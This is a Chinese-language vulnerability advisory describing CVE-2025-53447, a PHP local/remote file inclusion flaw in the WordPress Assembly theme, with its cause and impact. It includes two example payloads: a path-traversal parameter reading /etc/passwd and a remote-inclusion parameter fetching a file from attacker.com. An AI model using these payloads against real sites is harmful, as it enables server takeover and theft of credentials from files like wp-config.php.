CVE-2025-53447CVE-2025-53447是WordPress Assembly主题中的一个高危安全漏洞,CVSS评分达到8.1分。该漏洞属于PHP远程文件包含(RFI)和本地文件包含(LFI)类别,存在于Assembly主题的PHP文件中。由于程序对文件名控制不当,攻击者可以通过构造恶意请求包含任意本地或远程文件,从而可能导致敏感信息泄露、服务器权限被完全控制,甚至在特定条件下执行任意代码。该漏洞影响Assembly主题1.1及以下所有版本。由于WordPress主题广泛应用于各类网站,此漏洞可能影响大量使用该主题的网站。漏洞于2025年12月18日被披露,发现者为[email protected]。鉴于该漏洞的严重性和广泛影响范围,建议受影响的用户立即采取修复措施。
该漏洞源于Assembly主题中对include/require语句中文件名的不当控制。攻击者可以通过HTTP请求参数控制被包含的文件路径。在PHP中,当使用include、include_once、require或require_once语句时,如果文件名来自用户可控的输入且未经适当验证,攻击者可以操纵该输入来包含任意文件。本地文件包含(LFI)允许攻击者读取服务器上的敏感文件,如/etc/passwd、配置文件、wp-config.php等。远程文件包含(RFI)则更为危险,在allow_url_include配置为on时,攻击者可以直接包含远程服务器上的恶意PHP文件,从而实现远程代码执行。典型攻击向量是通过URL参数传递文件路径,如?file=../../../../../../etc/passwd或?file=http://attacker.com/malicious.txt。对于WordPress主题,由于主题文件通常具有较高的执行权限,成功利用此漏洞可能导致整个网站被完全控制。